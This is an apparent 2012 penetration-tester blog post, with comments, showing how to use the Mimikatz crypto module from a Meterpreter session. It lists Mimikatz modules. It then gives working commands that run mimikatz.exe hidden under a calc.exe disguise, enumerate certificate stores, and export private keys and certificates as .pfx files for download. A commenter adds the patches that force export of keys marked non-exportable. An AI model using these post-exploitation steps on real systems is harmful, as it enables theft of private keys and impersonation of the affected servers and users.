Monday, October 15, 2012

More with Mimikatz (Crypto Module)


So we all know that mimikatz dumps hashes and passwords!!! from memory which is the shiznazzle.

But, now that its working in memory, you can do lots more with it. Below are the various modules

    • "standard" ; commandes de base
    • crypto ; Cryptographie et certificats
    • sekurlsa ; Dump de hashes et de mots de passes Windows
    • system ; Gestion système
    • process ; Manipulation des processus
    • thread ; Manipulation des threads
    • service ; Manipulation des services
    • privilege ; Manipulation des privilèges
    • winmine ; Manipulation du démineur de Windows XP (démonstration)
    • minesweeper ; Manipulation du démineur de Windows Vista et 7 (démonstration)
    • nogpo ; Pour éviter quelques GPO triviales
    • samdump ; Dump de SAM offline
    • inject ; Injecteur de librairies
    • ts ; Manipulations Terminal Server
    • divers ; Fonctions diverses trop petites pour s’émanciper

The Crypto module does some interesting things.  I briefly talked about stealing certificates at DerbyCon. the crypto module helps you do this.

Things you are probably intersted in are:

crypto::listkeys, crypto::listProviders, crypto::listStores, crypto::listCertificates

to identify fun stuff that you want for your own from the host.

then crypto::exportKeys and crypto::exportCertifcates

to take that stuff home.

kinda looks like this:

meterpreter > execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::listStores" exit'
Process 9904 created. Channel 20 created. mimikatz 1.0 x86 (RC)   /* Traitement du Kiwi (Sep  8 2012 15:18:27) */ // http://blog.gentilkiwi.com/mimikatz mimikatz(commandline) # crypto::listStores
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'
        My
        Root
        Trust
        CA
        TrustedPublisher
        Disallowed
        AuthRoot
        TrustedPeople
        ADDRESSBOOK


mimikatz(commandline) # exit


execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My" exit'
Process 3472 created.
Channel 12 created.
mimikatz 1.0 x86 (RC)   /* Traitement du Kiwi (Sep  6 2012 04:02:46) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz(commandline) # crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My
Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'\My
         - sqlapps01
                Container Clé : SELFSSL
                Provider      : Microsoft RSA SChannel Cryptographic Provider
                Type          : AT_KEYEXCHANGE
                Exportabilité : OUI
                Taille clé    : 1024

mimikatz(commandline) # exit



execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" exit'
Process 6112 created.
Channel 23 created.
mimikatz 1.0 x86 (RC)   /* Traitement du Kiwi (Sep  6 2012 04:02:46) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz(commandline) # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE
Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'\My
         - MACHINENAME
                Container Clé : SELFSSL
                Provider      : Microsoft RSA SChannel Cryptographic Provider
                Type          : AT_KEYEXCHANGE
                Exportabilité : OUI
                Taille clé    : 1024
                Export privé dans  'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_MACHINENAME.pfx' : OK
                Export public dans 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_MACHINENAME.der' : OK

mimikatz(commandline) # exit


once exported you download the .pfx and .der files
CG

3 comments:

dre said...

Maybe the next mimikatz feature can be Internet-happy English translations

Gentil Kiwi said...

No

:)

Gentil Kiwi said...

btw, don't forget :
- crypto::patchcapi
or/and
- privilege::debug
- crypto::patchcng

it export "no exportable" ;)